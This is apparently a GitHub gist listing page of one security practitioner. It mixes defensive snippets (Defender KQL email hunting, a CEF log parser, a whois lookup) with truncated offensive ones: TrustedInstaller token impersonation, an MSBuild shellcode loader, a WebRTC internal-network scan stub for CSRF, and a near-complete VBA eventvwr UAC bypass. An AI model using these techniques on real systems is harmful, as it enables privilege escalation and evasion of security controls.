Dixie Flatline dxflatline
dxflatline
/ gist:7d643fa873d139d9cb744b2fc60c3c4c
Created
January 18, 2024 16:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Descriptor: | |
| Name: EmailHuntingCustomKQL | |
| DisplayName: Defender KQL for email discovery | |
| Description: Skills to query email logs in M365 Advanced Hunting | |
| SkillGroups: | |
| - Format: KQL | |
| Skills: | |
| - Name: GetLatestEmailsByRecipientSender | |
| DisplayName: Get Latest Emails By Recipient or Sender |
dxflatline
/ gist:acde39ab675e19220f3773a896eb6e9b
Last active
January 18, 2024 15:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Descriptor: | |
| Name: EmailHuntingCustomKQL | |
| DisplayName: Defender KQL for email discovery | |
| Description: Skills to query email logs in M365 Advanced Hunting | |
| SkillGroups: | |
| - Format: KQL | |
| Skills: | |
| - Name: GetLatestEmailsByRecipientSender | |
| DisplayName: Get Latest Emails By Recipient or Sender |
dxflatline
/ gist:acd7df0053bb1ae543616b1f294f0ce7
Created
August 28, 2017 21:03
Impersonate TrustedInstaller.exe token
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Slightly different version from tyranidlair, other functions used from NtObjectManager | |
| Uninstall-Module NtObjectManager | |
| Install-Module -Name NtObjectManager | |
| Stop-Service TrustedInstaller | |
| Start-Service TrustedInstaller | |
| $tipid = get-process TrustedInstaller | select -expand id | |
| $token = Get-NtTokenFromProcess -ProcessId $tipid | |
| $current = Get-NtThread -Current -PseudoHandle |
dxflatline
/ msbuild_sc_alloc.csproj
Created
July 7, 2017 19:04
MSBuild.exe shellcode execution (virtualalloc)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- Original work by https://gist.github.com/subTee --> | |
| <!-- Run like C:\Windows\Microsoft.NET\Framework\v4.0.30319>msbuild c:\temp\msbuild_sc_alloc.csproj --> | |
| <Target Name="Hello"> | |
| <FragmentExample /> | |
| <MeterExecute /> | |
| </Target> | |
| <UsingTask TaskName="FragmentExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <ParameterGroup/> |
dxflatline
/ gist:005f3b5a503a8290dc97e8aa9b7eafc2
Created
February 3, 2017 16:06
JRuby code to parse cef (logstash type)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| headers = event[@ceffield].match(/.*?CEF:\s?(\d+)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^\|\\]*(?:\\.[^\|\\]*)*)\|([^|]*)\|(.*)/).to_a | |
| event['deviceVendor'] = headers[2] | |
| event['deviceProduct'] = headers[3] | |
| event['deviceVersion'] = headers[4] | |
| event['deviceEventClassId'] = headers[5] | |
| event['name'] = headers[6] | |
| event['severity'] = headers[7] | |
| # Now, try to break out the Extension Dictionary | |
| unless headers[8].nil? | |
| ext = headers[8].scan(/(?:_+)?([\w.:\[\]]+)=(.*?(?=(?:\s[\w.:\[\]]+=|$)))/).to_a |
dxflatline
/ gist:f46fc0488ded52c6ac3cc306f9922f86
Created
February 3, 2017 14:05
IP to ASN to Range List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| whois 1.2.3.4 | grep origin | awk -F: '{print $2}' | tr -d '[:space:]' | xargs -i whois -h whois.ripe.net -T route {} -i origin | egrep "route: " | awk '{print $NF}' |
dxflatline
/ gist:0cc5ecfb2c5d04d3f4fb3166462a8393
Last active
October 11, 2020 00:08
JS STUB full internal network test (useful for CSRF exploitation)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| //get the IP addresses associated with an account | |
| function getIPs(callback) { | |
| //get the IP addresses associated with an accountfunction getIPs(callback){ | |
| var ip_dups = {}; | |
| //compatibility for firefox and chrome | |
| var RTCPeerConnection = window.RTCPeerConnection |
dxflatline
/ gist:6e399ea1fef59456d7ed82909f3bd506
Created
February 3, 2017 13:46
Bypass UAC eventvwr macro-code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Sleep is caught (may use ping instead?) | |
| ' Obfusc may be needed | |
| Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) | |
| Private Sub CommandButton1_Click() | |
| Set WSobj = CreateObject("WScript.Shell") | |
| WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "" | |
| WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "C:\windows\system32\cmd.exe", "REG_SZ" | |
| WSobj.Run ("C:\Windows\System32\eventvwr.exe") | |
| Sleep 2000 | |
| WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\" |